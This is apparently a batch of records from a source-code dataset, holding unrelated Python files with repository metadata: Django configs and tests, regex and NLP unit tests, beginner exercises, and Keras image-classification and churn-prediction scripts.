for key in col_list:
props[key]=query_row[key]
feature={'type' : 'Feature',
'geometry': geom,
'properties': props,
}
features.append(feature)
feat_coll={ 'type' : 'FeatureCollection',
'features':
features
}
feat_coll=json.dumps(feat_coll)
return(feat_coll)
#######################################################################
gauge_attributes=[]
temp=classify_qmax(gauge_attributes, params)
geo_str=create_featuresCollection(temp)
print "Content-type: text/javascript\n\n";
print geo_str
| [
"[email protected]"
] | |
054b85228723f89d5d938a9365b057b05b9f52aa | 67de204b7f0550def8eea7d6ca605f43aed653fc | /app/tests/lib/nlp/test_postagger.py | 3984b4960c71babfbcc24754b4549b5efb09f059 | [] | no_license | andymeneely/sira-nlp | b1b1bb8a783adac6a69001565d49d8357a4dd8c5 | b027a5d7407043b6541e2aa02704a7239f109485 | refs/heads/master | 2021-01-11T05:29:16.209735 | 2017-12-09T17:13:19 | 2017-12-09T17:13:19 | 69,055,241 | 1 | 1 | null | 2017-06-19T18:42:12 | 2016-09-23T19:36:51 | Python | UTF-8 | Python | false | false | 1,657 | py | from unittest import TestCase
from app.lib.nlp import postagger
class PosTaggerTestCase(TestCase):
def setUp(self):
pass
def test_execute(self):
data = [
'Gulf', 'Applied', 'Technologies', 'Inc', 'said', 'it', 'sold',
'its', 'subsidiaries', 'engaged', 'in', 'pipeline', 'and',
'terminal', 'operations', 'for', '12.2', 'mln', 'dlrs', '.',
'The', 'company', 'said', 'the', 'sale', 'is', 'subject', 'to',
'certain', 'post', 'closing', 'adjustments', ',', 'which',
'it', 'did', 'not', 'explain', '.', 'Reuter'
]
expected = [
('Gulf', 'NNP'), ('Applied', 'NNP'), ('Technologies', 'NNPS'),
('Inc', 'NNP'), ('said', 'VBD'), ('it', 'PRP'),
('sold', 'VBD'), ('its', 'PRP$'), ('subsidiaries', 'NNS'),
('engaged', 'VBN'), ('in', 'IN'), ('pipeline', 'NN'),
('and', 'CC'), ('terminal', 'JJ'), ('operations', 'NNS'),
('for', 'IN'), ('12.2', 'CD'), ('mln', 'NN'), ('dlrs', 'NN'),
('.', '.'), ('The', 'DT'), ('company', 'NN'), ('said', 'VBD'),
('the', 'DT'), ('sale', 'NN'), ('is', 'VBZ'),
('subject', 'JJ'), ('to', 'TO'), ('certain', 'JJ'),
('post', 'NN'), ('closing', 'NN'), ('adjustments', 'NNS'),
(',', ','), ('which', 'WDT'), ('it', 'PRP'), ('did', 'VBD'),
('not', 'RB'), ('explain', 'VB'), ('.', '.'), ('Reuter', 'NN')
]
actual = postagger.PosTagger(data).execute()
self.assertEqual(expected, actual)
| [
"[email protected]"
] | |
24e7016c20f1d6e87624409258a5c85ebc441447 | a066134017b7d4cb7ac6f342b18f75c3b768fb87 | /1-python-basics/1-baby-steps/3-numbers/WorkingWithNumbers.py | c3f031764b997efcc566f68317b8c8c86d73188d | [] | no_license | akyare/Python-Students-IoT | e6612af05629a32bae841225f17c5076a4499ca9 | 3886e7cced42622e3989873749d33476cc6b5f6f | refs/heads/main | 2023-01-22T04:43:41.723276 | 2020-12-03T10:56:01 | 2020-12-03T10:56:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 820 | py | # !Second part! has some useful methods, for complex mathematical computations
import math
# Lets declare a variable that represents a constant
# This does not exist in Python but our naming convention hints it[so that other programmers know]:
PI = 3.14
# We can round a number as follows:
print(round(PI))
# Lets make a negative variable:
NEG_PI = -3.14
# We can see it's absolute value as follows:
print(abs(NEG_PI))
# To see all the built in functions python go to:
# https://docs.python.org/3/library/functions.html
# !SECOND PART OF DEMO!
print(math.floor(PI))  # largest integer <= PI -> 3
print(math.ceil(PI))   # smallest integer >= PI -> 4
# To see all the built in functions in the math module go to:
# https://docs.python.org/3/library/math.html
| [
"[email protected]"
] | |
76f5cd7a8c6492d738ef5a9ad5159c49de5bd054 | 85df99004c7d38f410955813f51ca922f58d8f17 | /artist/migrations/0014_auto_20180615_0726.py | bf1d4469c3076d783d81be0e01df8914241f3d35 | [] | no_license | kathryn-choi/AppleMusic_Ticket | faf5d25d41997e22be17f11d1e5b8eca5006019c | 383160f318afdd66daeeea5356ec912d01ee89a8 | refs/heads/master | 2020-03-21T02:57:32.013846 | 2018-06-21T05:44:57 | 2018-06-21T05:44:57 | 138,030,422 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 430 | py | # Generated by Django 2.0.6 on 2018-06-15 07:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('artist', '0013_remove_artist_published_date'),
]
operations = [
migrations.AlterField(
model_name='artist',
name='image',
field=models.ImageField(blank=True, default='illenium.jpg', upload_to=''),
),
]
| [
"[email protected]"
] | |
34d86f8f53ca6b7fd54d7302f48943d82757b990 | 17acb8e20f9a24b16ce3651302fc2d7fc7b887a6 | /test/programytest/utils/regex/regex_tests.py | 1a671a536fc6bf0234bd6cb3da2aa838bc783644 | [
"MIT"
] | permissive | cen-ai/program-y | 91052fdc11aec0f60311e3429895fac489d8ce54 | a753667638147544c54dbebd9f1c8f9ae7f2159e | refs/heads/master | 2020-03-22T15:11:07.896885 | 2018-10-15T22:13:58 | 2018-10-15T22:13:58 | 140,234,173 | 5 | 5 | NOASSERTION | 2019-01-03T09:09:07 | 2018-07-09T05:11:08 | Python | UTF-8 | Python | false | false | 2,376 | py | import unittest
import re
class RegularExpressionTests(unittest.TestCase):
def test_anything(self):
pattern = re.compile(r"^.*$", re.IGNORECASE)
self.assertIsNotNone(pattern.match(""))
self.assertIsNotNone(pattern.match("This"))
self.assertIsNotNone(pattern.match("This That"))
def test_anytext(self):
pattern = re.compile(r"^.+$", re.IGNORECASE)
self.assertIsNone(pattern.match(""))
self.assertIsNotNone(pattern.match("This"))
self.assertIsNotNone(pattern.match("This That"))
def test_anyinteger(self):
pattern = re.compile(r"^\d+$", re.IGNORECASE)
self.assertIsNone(pattern.match(""))
self.assertIsNotNone(pattern.match("123"))
def test_anydecimal(self):
pattern = re.compile(r"^\d+\.\d+$", re.IGNORECASE)
self.assertIsNotNone(pattern.match("123.3"))
def test_anynumber(self):
pattern = re.compile(r"^[\d+\.\d+$]|[\d+]$", re.IGNORECASE)
self.assertIsNotNone(pattern.match(".23"))
self.assertIsNotNone(pattern.match("123"))
self.assertIsNotNone(pattern.match("123.3"))
def test_legion(self):
pattern = re.compile(r"^LEGION$", re.IGNORECASE)
self.assertIsNotNone(pattern.match("LEGION"))
self.assertIsNotNone(pattern.match("legion"))
self.assertIsNotNone(pattern.match("LegioN"))
self.assertIsNone(pattern.match("LEGIONAIRRE"))
def test_email(self):
pattern = re.compile(r"^[-a-z0-9_.]+@(?:[-a-z0-9]+\.)+[a-z]{2,6}$", re.IGNORECASE)
self.assertIsNotNone(pattern.match("[email protected]"))
def test_postcode(self):
pattern = re.compile(r"^[a-z]{1,2}\d{1,2}[a-z]?\s*\d[a-z]{2}$", re.IGNORECASE)
self.assertIsNotNone(pattern.match("KY1 1YY"))
def test_zipcode(self):
pattern = re.compile(r"^\d{5}(?:[-\s]\d{4})?$", re.IGNORECASE)
self.assertIsNotNone(pattern.match("12345"))
self.assertIsNotNone(pattern.match("12345 1234"))
def test_ukdate(self):
pattern = re.compile(r"^[0123]?\d[-/\s\.](?:[01]\d|[a-z]{3,})[-/\s\.](?:\d{2})?\d{2}$", re.IGNORECASE)
self.assertIsNotNone(pattern.match("31-02-2017"))
def test_time(self):
pattern = re.compile(r"^\d{1,2}:\d{1,2}(?:\s*[aApP]\.?[mM]\.?)?$", re.IGNORECASE)
self.assertIsNotNone(pattern.match("11:23am"))
| [
"[email protected]"
] | |
db3e1c1bf678195a26227a8b3f35f06a6f8444f7 | b41dc1d763fe94b0959c9dfc2e41e8da773fec99 | /choose_lunch.py | a387906ee3626365870c5f843d68852a34d7a4a1 | [] | no_license | axschech/code_snippets | 862e482bc86ad65d8a77a901bcbae33013916958 | 483e1d9e2fd4b2daaf394d5c5233b579e4509408 | refs/heads/master | 2021-01-10T20:35:14.040349 | 2018-10-05T00:56:30 | 2018-10-05T00:56:30 | 22,748,263 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 915 | py | import random
def getChoices():
choices = []
def buildChoices():
def getChoice():
choice = raw_input("Please enter a choice\n")
return choice
choices.append(getChoice())
if len(choices)>0:
check = raw_input("Would you like to add another? Choose y/n")
if(check=="y") :
buildChoices()
else :
buildChoices()
return choices
return buildChoices()
def selectChoice(runs, choices):
    # draw a random choice `runs` times and tally how often each one comes up
    selects = choices
    stats = {}
    for z in range(0, len(selects)):
        print selects[z]
        stats[selects[z]] = 0
    for i in range(0, runs):
        num = random.randint(0, len(selects)-1)
        stats[selects[num]] = stats[selects[num]] + 1
        #print selects[num]
    print str(stats)
def run():
theInput = raw_input("How many times would you like to run? \n")
theChoices = getChoices()
try:
inNum = int(theInput)
selectChoice(inNum,theChoices)
except:
print "That is not a number!"
run()
run() | [
"dev@dev-VirtualBox.(none)"
] | dev@dev-VirtualBox.(none) |
390d10cf1c012a53d3d4ac7e3f687bf9f6f4905c | 5797d503ec5801ec7d323db499480f6eb568d604 | /music/urls.py | 918f92a97ed0606dd5efe237013947d43d6f0ef9 | [] | no_license | Babak-khezri/Django-music | c9f0460ca02532cc2ec7c3b9e736778fe060edac | 2cade155c736c2a4e5511d1f6913c7d789a84cd4 | refs/heads/main | 2023-03-03T18:09:22.738140 | 2021-02-14T04:29:26 | 2021-02-14T04:29:26 | 338,692,031 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 400 | py | from django.urls import path
from .views import home, music_list,search_list
app_name = 'music'
urlpatterns = [
path('', home, name='home'),
path('music_list/', music_list, name='music_list'),
path('music_list/page/<int:page>', music_list, name='music_list'),
path('search_list/', search_list, name='search_list'),
path('search_list/page/<int:page>', search_list, name='search_list'),
]
| [
"[email protected]"
] | |
eab50f4ea49819066bf4e3a96edb904d2d1a6707 | 00eff4e0d1a4bce6f36e68c62c617b01417bf63a | /tests/eucaby_api/test_models.py | 468348146df2be9ab6df5170fa5533775fbe43ff | [] | no_license | tayduivn/eucaby | f6aac260993bbc0e48a54e12981cb7c05f0e05e6 | e3947eaf035c2b06b2cee22f18fdec81c434ee84 | refs/heads/master | 2021-09-13T13:08:40.669341 | 2017-12-17T19:28:40 | 2017-12-17T19:28:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,983 | py | # -*- coding: utf-8 -*-
"""Tests for Eucaby API models."""
import flask
import mock
import unittest
from google.appengine.api import memcache
from sqlalchemy.orm import exc as orm_exc
from eucaby_api import args as api_args
from eucaby_api import models
from tests.eucaby_api import base as test_base
from tests.eucaby_api import fixtures
from tests.utils import utils as test_utils
class TestToken(test_base.TestCase):
"""Tests User and Token models."""
def setUp(self):
super(TestToken, self).setUp()
self.user = models.User.create(
username='2345', first_name='Test', last_name=u'Юзер',
email='[email protected]')
def test_create_facebook_token(self):
"""Tests create facebook token."""
params = dict(user_id=self.user.id, access_token='123qweasd',
expires_seconds=5)
token = models.Token.create_facebook_token(**params)
test_utils.assert_object(
token, user_id=self.user.id, service=models.FACEBOOK,
access_token=params['access_token'], refresh_token=None)
self.assertEqual(1, models.Token.query.count())
def test_create_or_update_eucaby_token(self):
"""Tests create and update eucaby token."""
token_dict = dict(
access_token=fixtures.UUID,
expires_in=self.app.config['OAUTH2_PROVIDER_TOKEN_EXPIRES_IN'],
refresh_token=fixtures.UUID, scope=' '.join(models.EUCABY_SCOPES),
token_type=fixtures.TOKEN_TYPE)
token = models.Token.create_eucaby_token(self.user.id, token_dict)
test_utils.assert_object(
token, user_id=self.user.id, service=models.EUCABY,
access_token=fixtures.UUID, refresh_token=fixtures.UUID)
self.assertEqual(1, models.Token.query.count())
token_dict['access_token'] = fixtures.UUID2
# Refresh token exists
token.update_token(token_dict)
token_obj = models.Token.query.first() # Query form database
test_utils.assert_object(
token_obj, user_id=self.user.id, service=models.EUCABY,
access_token=fixtures.UUID2, refresh_token=fixtures.UUID)
def test_get_by(self):
"""Tests token get by parameters."""
# Unknown service
self.assertRaises(AssertionError, models.Token.get_by, 'Unknown')
# Populate Eucaby and FB tokens
for i in range(2):
params = dict(access_token='{}'.format(i), expires_in=5, scope='',
refresh_token='{}'.format(i))
models.Token.create_eucaby_token(self.user.id, params)
params = dict(user_id=self.user.id, access_token='{}'.format(i+10),
expires_seconds=5)
models.Token.create_facebook_token(**params)
# Check Eucaby token
token = models.Token.get_by(models.EUCABY)
self.assertEqual(models.EUCABY, token.service)
self.assertEqual('1', token.access_token)
# Check FB token
token = models.Token.get_by(models.FACEBOOK)
self.assertEqual(models.FACEBOOK, token.service)
self.assertEqual('11', token.access_token)
class TestUserSettings(test_base.TestCase):
"""Tests UserSettings model."""
def setUp(self):
super(TestUserSettings, self).setUp()
self.testbed = test_utils.create_testbed()
self.user = models.User.create(
username='2345', first_name='Test', last_name=u'Юзер',
email='[email protected]')
def tearDown(self):
super(TestUserSettings, self).tearDown()
self.testbed.deactivate()
def test_user_settings(self):
"""Tests that user settings are created when user is created."""
objs = models.UserSettings.query.all()
self.assertEqual(1, len(objs))
# Initial settings
self.assertEqual(flask.json.dumps(models.UserSettings.DEFAULT_SETTINGS),
objs[0].settings)
def test_get_or_create(self):
"""Tests get or create user settings."""
models.UserSettings.query.delete() # Clear user settings first
# User exists
models.UserSettings.get_or_create(self.user.id, commit=False)
objs = models.UserSettings.query.all()
# With commit set to False no object is created
self.assertEqual([], objs)
# User doesn't exist
self.assertRaises(orm_exc.NoResultFound,
models.UserSettings.get_or_create, (123), commit=True)
models.db.session.rollback() # Rollback session
# Successful user settings creation (operation is idempotent)
for i in range(2): # pylint: disable=unused-variable
obj = models.UserSettings.get_or_create(self.user.id, commit=True)
objs = models.UserSettings.query.all()
default_settings = flask.json.dumps(
models.UserSettings.DEFAULT_SETTINGS)
self.assertEqual([obj], objs)
self.assertEqual(default_settings, obj.settings)
self.assertEqual(
models.UserSettings.DEFAULT_SETTINGS, obj.to_dict())
def test_update(self):
"""Tests settings update."""
obj = models.UserSettings.get_or_create(self.user.id)
obj.update({}, commit=True) # Empty settings first
# Test A: Set settings
obj.update(dict(hello='world'))
self.assertEqual('{"hello": "world"}', obj.settings)
# Settings is committed
obj2 = models.UserSettings.query.first()
self.assertEqual('{"hello": "world"}', obj2.settings)
# Test B: Update settings param
obj = models.UserSettings.get_or_create(self.user.id)
obj.update(dict(hello='you'))
self.assertEqual('{"hello": "you"}', obj.settings)
# Test C: Add a new param
obj = models.UserSettings.get_or_create(self.user.id)
obj.update(dict(test='me'))
self.assertEqual('{"hello": "you", "test": "me"}', obj.settings)
# Test D: Update settings to default values
obj = models.UserSettings.get_or_create(self.user.id)
obj.update(None)
obj2 = models.UserSettings.query.first()
self.assertEqual(flask.json.dumps(models.UserSettings.DEFAULT_SETTINGS),
obj2.settings)
@unittest.skip('Skip restricting setting the settings field')
def test_set_settings(self):
"""Tests set settings."""
obj = models.UserSettings.get_or_create(self.user.id)
# Empty string is not a valid json format: obj.settings = ''
self.assertRaises(ValueError, setattr, obj, 'settings', '')
obj.settings = '{"hello": "world"}' # Valid json format
obj.settings = None # None is allowed
obj.setting = '[]' # Empty list if also allowed
def test_param(self):
"""Tests param method."""
obj = models.UserSettings.get_or_create(self.user.id, commit=True)
self.assertEqual(None, obj.param('hello')) # No parameter set
obj.update({'hello': 'world'}, commit=True) # Set parameter
obj2 = models.UserSettings.query.first()
self.assertEqual('world', obj2.param('hello'))
# Clear parameters
obj = models.UserSettings.get_or_create(self.user.id)
obj.update(None)
obj2 = models.UserSettings.query.first()
self.assertEqual(None, obj2.param('hello'))
def test_user_param(self):
"""Tests user settings param."""
cache_key = 'user_id::{}::settings'.format(self.user.id)
get_or_create = 'eucaby_api.models.UserSettings.get_or_create'
# When UserSettings object is created settings cache is not set
self.assertIsNone(memcache.get(cache_key))
# If cache is not set calling user_param will also call get_or_create
with mock.patch(get_or_create) as gc_mock:
gc_mock.return_value = mock.Mock(settings='{}')
models.UserSettings.user_param(self.user.id, 'hello')
self.assertTrue(gc_mock.called)
memcache.flush_all()
# Wrong user id
with self.assertRaises(orm_exc.NoResultFound):
models.UserSettings.user_param('wrong', 'hello')
# Non-existing key
value = models.UserSettings.user_param(self.user.id, 'hello')
self.assertIsNone(value)
self.assertEqual( # user_param sets the cache
'{"email_subscription": true}', memcache.get(cache_key))
# If settings cache is set it shouldn't call get_or_create
with mock.patch(get_or_create) as gc_mock:
models.UserSettings.user_param(self.user.id, 'hello')
self.assertFalse(gc_mock.called)
# Updating settings should refresh the cache
obj = models.UserSettings.get_or_create(self.user.id)
obj.update(dict(hello='world'))
text = '{"email_subscription": true, "hello": "world"}'
self.assertEqual(text, memcache.get(cache_key))
value = models.UserSettings.user_param(self.user.id, 'hello')
self.assertEqual('world', value)
class TestDevice(test_base.TestCase):
"""Tests Device model."""
def setUp(self):
super(TestDevice, self).setUp()
self.user = models.User.create(
username='2345', first_name='Test', last_name=u'Юзер',
email='[email protected]')
self.user2 = models.User.create(
username='1234', first_name='Test2', last_name=u'Юзер2',
email='[email protected]')
def test_create(self):
"""Create device is indempotent."""
for i in range(2): # pylint: disable=unused-variable
obj = models.Device.get_or_create(
self.user, 'somedevicekey', 'android')
objs = models.Device.query.all()
self.assertEqual(1, len(objs))
self.assertEqual(objs[0], obj)
test_utils.assert_object(
obj, device_key='somedevicekey', platform='android')
self.assertEqual(1, len(obj.users))
def test_many_users(self):
"""Two and more users can be associated with the same device."""
obj = models.Device.get_or_create(self.user, 'somedevicekey', 'android')
obj2 = models.Device.get_or_create(
self.user2, 'somedevicekey', 'android')
objs = models.Device.query.all()
self.assertEqual(1, len(objs))
self.assertEqual(obj, obj2)
# Should have two users
self.assertEqual([self.user, self.user2], obj.users)
def test_get_by_user(self):
"""List of devices by user."""
obj1 = models.Device.get_or_create(
self.user, 'somedevicekey', 'android')
obj2 = models.Device.get_or_create(
self.user, 'olddevicekey', 'ios')
models.Device.get_or_create(
self.user2, 'newdevicekey', 'android')
objs = models.Device.get_by_username(self.user.username)
self.assertEqual([obj1, obj2], objs)
# Filter by platform
objs = models.Device.get_by_username(
self.user.username, platform='android')
self.assertEqual([obj1], objs)
# Deactivate one device
obj2.deactivate()
self.assertFalse(obj2.active)
self.assertEqual(
[obj1], models.Device.get_by_username(self.user.username))
def test_deactivate_multiple(self):
"""Tests deactivate multiple devices."""
# Create devices
device_params = [
('12', api_args.ANDROID), ('23', api_args.IOS),
('34', api_args.IOS), ('45', api_args.ANDROID)]
devices = [models.Device.get_or_create(
self.user, *param) for param in device_params]
devices[0].deactivate()
def _verify_devices(username, device_objs):
objs = models.Device.get_by_username(username)
self.assertEqual(device_objs, objs)
# No device keys or no devices for the device keys
cases = [[], ['11', '22']]
for device_keys in cases:
models.Device.deactivate_multiple(device_keys)
_verify_devices(self.user.username, devices[1:])
# Existing devices
models.Device.deactivate_multiple(['23', '34'])
_verify_devices(self.user.username, devices[3:])
# Deactivate by platform
# Has no iOS device with the device_key
models.Device.deactivate_multiple(['45',], platform=api_args.IOS)
_verify_devices(self.user.username, devices[3:])
# Has Android device with the device_key
models.Device.deactivate_multiple(['45',], platform=api_args.ANDROID)
_verify_devices(self.user.username, [])
class TestEmailHistory(test_base.TestCase):
"""Tests EmailHistory model."""
def setUp(self):
super(TestEmailHistory, self).setUp()
self.user = models.User.create(
username='2345', first_name='Test', last_name=u'Юзер',
email='[email protected]')
self.user2 = models.User.create(
username='1234', first_name='Test2', last_name=u'Юзер2',
email='[email protected]')
def test_get_or_create(self):
"""Tests get or create email history."""
cases = ['hello', 'Hello']
for text in cases:
obj = models.EmailHistory.get_or_create(self.user.id, text)
self.assertEqual('hello', obj.text)
self.assertEqual(1, models.EmailHistory.query.count())
def test_get_by_user(self):
"""Tests filtering by user."""
# Populate email history
cases = (
(self.user, ['Alaska', 'Arkansas', 'arizona', 'ARIZONA', 'colorado',
'Connecticut', 'California']),
(self.user2, ['alabama', ]))
for user, text_list in cases:
for text in text_list:
models.EmailHistory.get_or_create(user.id, text=text)
all_list = ['alaska', 'arizona', 'arkansas', 'california', 'colorado',
'connecticut']
cases = (
(dict(user_id=None), []), # Unknow user
(dict(user_id=self.user.id), all_list), # Get by user
# Empty query
(dict(user_id=self.user.id, query=''), []),
# Query with empty result
(dict(user_id=self.user.id, query='d'), []),
# Query with result, no limit
(dict(user_id=self.user.id, query='ar'), ['arizona', 'arkansas']),
# Query with limit
(dict(user_id=self.user.id, query='a', limit=2),
['alaska', 'arizona']),
# Query with large limit
(dict(user_id=self.user.id, query='a', limit=100),
['alaska', 'arizona', 'arkansas']))
for kwargs, email_list in cases:
objs = models.EmailHistory.get_by_user(**kwargs)
self.assertEqual(email_list, [obj.text for obj in objs])
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
706ea96b1d69e63a0c8a768ea8843ab3bd9e5428 | 8d1309e560216fb84aee6b5fac4f7d8fac07f5d6 | /jiangyuan/图像分类/keras/图像分类sequential.py | 74c8f7d99dfab48c1d04a4f3040b771f1569b333 | [] | no_license | NWU-SMART/2019TEAMNEW-TrainCodes | 2dfb4d160d6419d96538f033b1332c2cb171e3e0 | 91a6c8b9395fff72079f21c4a26401179f3ad8a6 | refs/heads/master | 2022-12-23T22:03:39.030888 | 2020-10-05T07:06:00 | 2020-10-05T07:06:00 | 270,465,529 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,847 | py | # ----------------开发者信息--------------------------------#
# 开发者:姜媛
# 开发日期:2020年6月2日
# 修改日期:
# 修改人:
# 修改内容:
# ----------------开发者信息--------------------------------#
# ---------------------- 代码布局: ----------------------
# 1、导入 Keras, matplotlib, numpy, sklearn 和 panda的包
# 2、招聘数据数据导入
# 3、分词和提取关键词
# 4、建立字典,并使用
# 5、训练模型
# 6、保存模型,显示运行结果
# ---------------------- 代码布局: ----------------------
# -------------------------- 1、导入需要包 -------------------------------
from tensorflow.python.keras.utils import get_file
import gzip
import numpy as np
import keras
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Conv2D, MaxPooling2D
import os
import functools
import matplotlib.pyplot as plt
#  -------------------------- 1. Import packages -------------------------------
#  -------------------------- 2. Load data and preprocess -------------------------------
# The dataset files just need to sit in the same folder as the code
def load_data():
paths = [
'C:\\Users\\HP\\Desktop\\每周代码学习\\图像分类\\train-labels-idx1-ubyte.gz',
'C:\\Users\\HP\\Desktop\\每周代码学习\\图像分类\\train-images-idx3-ubyte.gz',
'C:\\Users\\HP\\Desktop\\每周代码学习\\图像分类\\t10k-labels-idx1-ubyte.gz',
'C:\\Users\\HP\\Desktop\\每周代码学习\\图像分类\\t10k-images-idx3-ubyte.gz'
]
with gzip.open(paths[0], 'rb') as lbpath:
y_train = np.frombuffer(lbpath.read(), np.uint8, offset=8)
with gzip.open(paths[1], 'rb') as imgpath:
x_train = np.frombuffer(
imgpath.read(), np.uint8, offset=16).reshape(len(y_train), 28, 28, 1)
with gzip.open(paths[2], 'rb') as lbpath:
y_test = np.frombuffer(lbpath.read(), np.uint8, offset=8)
with gzip.open(paths[3], 'rb') as imgpath:
x_test = np.frombuffer(
imgpath.read(), np.uint8, offset=16).reshape(len(y_test), 28, 28, 1)
return (x_train, y_train), (x_test, y_test)
(x_train, y_train), (x_test, y_test) = load_data()
batch_size = 32
num_classes = 10
epochs = 5
data_augmentation = True  # use image augmentation
num_predictions = 20
save_dir = os.path.join(os.getcwd(), 'saved_models_cnn')
model_name = 'keras_fashion_trained_model.h5'
# Convert class vectors to binary class matrices (one-hot encode the labels)
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255  # normalize to [0, 1]
x_test /= 255  # normalize to [0, 1]
# -------------------------- 2. Load and preprocess the data -------------------------------
# -------------------------- 3. Sequential model -------------------------------
model = Sequential()
model.add(Conv2D(32, (3, 3), padding='same',      # 32 filters of size (3, 3)
                 input_shape=x_train.shape[1:]))  # the first layer must specify the input shape
model.add(Activation('relu'))
model.add(Conv2D(32, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Conv2D(64, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(Conv2D(64, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(512))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes))
model.add(Activation('softmax'))
# initiate RMSprop optimizer
opt = keras.optimizers.RMSprop(lr=0.0001, decay=1e-6)
# Let's train the model using RMSprop
model.compile(loss='categorical_crossentropy',
optimizer=opt,
metrics=['accuracy'])
# -------------------------- 3. Sequential model -------------------------------
# -------------------------- 4. Data augmentation and model training -------------------------------
if not data_augmentation:
print('Not using data augmentation.')
history = model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs,
validation_data=(x_test, y_test),
shuffle=True)
else:
print('Using real-time data augmentation.')
datagen = ImageDataGenerator(
featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
zca_whitening=False,
zca_epsilon=1e-06,
rotation_range=0,
width_shift_range=0.1,
height_shift_range=0.1,
shear_range=0.,
zoom_range=0.,
channel_shift_range=0.,
fill_mode='nearest',
cval=0.,
horizontal_flip=True,
vertical_flip=False,
rescale=None,
preprocessing_function=None,
data_format=None,
validation_split=0.0)
datagen.fit(x_train)
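    # datagen.fit() only computes the statistics needed for featurewise
    # normalization / ZCA whitening, so it is only required when those
    # options are enabled.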
    print(x_train.shape[0] // batch_size)  # integer division
    print(x_train.shape[0] / batch_size)  # float division
history = model.fit_generator(datagen.flow(x_train, y_train, batch_size=batch_size),
epochs=epochs,
steps_per_epoch=x_train.shape[0]//batch_size,
validation_data=(x_test, y_test),
workers=10
)
# -------------------------- 4. Data augmentation and model training -------------------------------
# -------------------------- 5. Save the model -------------------------------
model.summary()
# Save model and weights
if not os.path.isdir(save_dir):
os.makedirs(save_dir)
model_path = os.path.join(save_dir, model_name)
model.save(model_path)
print('Saved trained model at %s ' % model_path)
# -------------------------- 5. Save the model -------------------------------
# -------------------------- 6. Show the training results -------------------------------
# Plot training & validation accuracy
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('Model accuracy')
plt.ylabel('Accuracy')
plt.xlabel('Epoch')
plt.legend(['Train', 'Valid'], loc='upper left')
plt.savefig('tradition_cnn_valid_acc.png')
plt.show()
# Plot training & validation loss
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('Model loss')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.legend(['Train', 'Valid'], loc='upper left')
plt.savefig('tradition_cnn_valid_loss.png')
plt.show()
# -------------------------- 6. Show the training results -------------------------------
# ==== /Course_Material/Machine Learning A-Z Template Folder/Part 8 - Deep Learning/Section 39 - Artificial Neural Networks (ANN)/ann.py (ZackMinott/Machine-Learning-Course) ====
# Artificial Neural Network
# Installing Theano
# pip install --upgrade --no-deps git+git://github.com/Theano/Theano.git
# Installing TensorFlow
# Install TensorFlow from the website: https://www.tensorflow.org/versions/r0.11/get_started
# Installing Keras
# pip install --upgrade keras
# Keras runs on top of the TensorFlow or Theano backend
# Part 1 - Data Preprocessing
# Importing the Libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the Dataset
dataset = pd.read_csv('Churn_Modelling.csv')
X = dataset.iloc[:, 3:13].values # Independent Variables
y = dataset.iloc[:, 13].values
# Encoding Categorical Data
from sklearn.preprocessing import OneHotEncoder
from sklearn.compose import ColumnTransformer
ct = ColumnTransformer([('encoder', OneHotEncoder(), [1,2])], remainder = 'passthrough')
X = np.array(ct.fit_transform(X), dtype = np.float)
# Encoding the Dependent Variable
from sklearn.preprocessing import LabelEncoder
y = LabelEncoder().fit_transform(y)
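# Drop the first dummy column to avoid the dummy variable trap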
X = X[:, 1:]
#Splitting the dataset into the Training Set and Test Set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
# Part 2 - Now let's make the ANN!
# Importing the Keras libraries and packages
import keras
from keras.models import Sequential # Used to initialize neural network
from keras.layers import Dense # import layers for neural network
# Initialising the ANN
classifier = Sequential()
# Adding the input layer and the first hidden layer
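# (6 units follows the common "(inputs + outputs) / 2" rule of thumb: (12 + 1) / 2 ≈ 6)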
classifier.add(Dense(units = 6, kernel_initializer = 'uniform', activation = 'relu', input_dim = 12))
# Add the second hidden layer
classifier.add(Dense(units = 6, kernel_initializer = 'uniform', activation = 'relu'))
# Adding the output layer
classifier.add(Dense(units = 1, kernel_initializer = 'uniform', activation = 'sigmoid'))
# Compiling the ANN
classifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])
# Fitting the ANN to the Training Set
classifier.fit(X_train, y_train, batch_size = 10, epochs = 100)
# Part 3 -- Making the predictions and evaluating the model
# Predicting the Test set results
y_pred = classifier.predict(X_test)
y_pred = (y_pred > 0.5) # returns true if greater than 0.5
# Making the Confusion Matrix
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred) | [
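# Quick sanity check: overall accuracy from the confusion matrix diagonal
accuracy = (cm[0, 0] + cm[1, 1]) / cm.sum()
print('Test set accuracy:', accuracy)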
"[email protected]"
] | |
